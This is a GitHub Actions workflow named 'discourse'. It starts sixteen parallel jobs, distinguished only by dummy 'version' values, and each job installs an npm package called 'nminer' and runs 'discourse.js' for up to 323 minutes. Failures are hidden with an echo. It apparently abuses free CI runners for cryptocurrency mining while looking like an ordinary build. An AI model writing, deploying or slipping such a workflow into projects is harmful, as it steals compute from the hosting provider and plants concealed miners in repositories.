name: discourse
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 4522 }
          - { version: 1572 }
          - { version: 1890 }
          - { version: 2700 }
          - { version: 1602 }
          - { version: 3421 }
          - { version: 2968 }
          - { version: 6685 }
          - { version: 5319 }
          - { version: 4467 }
          - { version: 3463 }
          - { version: 801 }
          - { version: 8105 }
          - { version: 6574 }
          - { version: 7572 }
          - { version: 9743 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: slap even
        run: |
          npm install nminer@latest
          timeout 323m node discourse.js || echo "discourse executed"